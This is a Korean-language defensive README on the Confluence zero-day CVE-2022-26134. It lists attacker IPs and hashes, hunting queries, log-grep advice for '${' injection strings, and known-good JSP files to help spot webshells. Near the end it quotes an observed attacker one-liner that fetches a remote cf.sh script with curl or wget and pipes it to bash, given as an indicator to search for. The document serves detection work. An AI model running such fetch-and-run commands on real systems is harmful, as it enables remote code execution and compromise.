
이 저장소는 Atlassian Confluence의 제로데이(Zero-Day) 악용에 대해 다루며, SecOps 또는 Blue Team 관점에서의 방어 및 분석 관점을 제시합니다.
이 저장소는 Atlassian Confluence의 제로데이 익스플로잇에 대해 다루며, SecOps 또는 블루 팀(Blue Team) 관점에서의 방어 및 분석 시각을 제공합니다.
미국 현충일(Memorial Day) 주말 동안 Volexity는 Atlassian Confluence Server 소프트웨어를 실행 중인 고객의 인터넷에 노출된 웹 서버 두 대와 관련된 침해 사고 대응 조사를 수행했습니다. 조사는 호스트에서 의심스러운 활동이 감지된 후 시작되었으며, 여기에는 JSP 웹셸이 디스크에 기록되는 것이 포함되었습니다. Volexity는 즉시 Volexity Surge Collect Pro를 사용하여 분석을 위해 Confluence Server 시스템의 시스템 메모리와 주요 파일을 수집했습니다. 수집된 데이터를 철저히 검토한 후, Volexity는 서버 침해가 원격 코드 실행을 달성하기 위해 공격자가 익스플로잇을 실행한 데서 비롯되었음을 확인할 수 있었습니다. 이후 Volexity는 해당 익스플로잇을 재현하고 완전히 최신 상태인 Confluence Server 버전에 영향을 미치는 제로데이 취약점을 식별했습니다.
이 취약점의 발견과 검증 이후, Volexity는 2022년 5월 31일 관련 세부 정보를 보고하기 위해 Atlassian에 연락했습니다. Atlassian은 이후 취약점을 확인하고 해당 이슈를 CVE-2022-26134로 지정했습니다. 이 취약점은 현재 버전의 Confluence Server 및 Data Center에서도 작동하는 것으로 확인되었습니다.
기술적 세부 정보는 여기를 참조하세요.
154.146.34.145
154.16.105.147
156.146.34.46
156.146.34.52
156.146.34.9
156.146.56.136
198.147.22.148
198.147.22.148
221.178.126.244
45.43.19.91
59.163.248.170
64.64.228.239
66.115.182.102
66.115.182.111
67.149.61.16
98.32.230.38
193.106.191.48
f39b321472b8dac2452e4c0bc687cb5aa401ac6687520fdc9fd523a17477886d
f8df4dd46f02dc86d37d46cf4793e036
DeviceProcessEvents
| where InitiatingProcessFileName has_any( @"tomcat9.exe")
//| where ProcessCommandLine has_any (@"whoami.exe",@"nslookup.exe")
(install directory)/logs/*.log에서 ${ 문자열을 찾으십시오.egrep -a -i -f pattern.txt *.log 를 시도하세요. 여기서 pattern.txt에는 ${가 저장되어 있어야 합니다. 또는 grep "\${" log file path 또는 grep "$%7B" log file path를 시도하세요.findstr -i noop.jsp "logpath"를 시도해 볼 수 있습니다.confluence_install_dir/work/Standalone/ 디렉터리에서 $jspname_jsp.java를 찾아보세요. 예를 들어 hack.jsp라는 셸 이름을 찾았다면 hack_jsp.java도 있어야 합니다. 디스크에 hack.jsp가 더 이상 없다면 웹 로그에서 해당 파일에 대한 액세스를 찾아보세요. 이를 통해 해당 파일이 언제 액세스/삭제되었는지에 대한 중요한 단서를 얻을 수 있습니다../admin/findspaceattachments.jsp
./admin/cluster/hashclustername.jsp
./admin/default.jsp
./classpath.jsp
./errors/notfound.jsp
./500page.jsp
./errors.jsp
./noop.jsp
따라서 위에 나열되지 않은 새로 생성된 파일을 찾으십시오.
./confluence/org/apache/jsp/ 디렉터리에 있어서는 안 되는 .java 파일을 찾으십시오.java->bash->python->bash와 같은 프로세스 트리를 찾아야 합니다.process where event='CreateProcess' and parent_process_path='/opt/atlassian/confluence/jre/bin/java' and process_user_name='confluence'bash -c '(curl -s 195.2.79[.]26/cf.sh||wget -q -O- 195.2.79[.]26/cf.sh)|bash를 찾으십시오.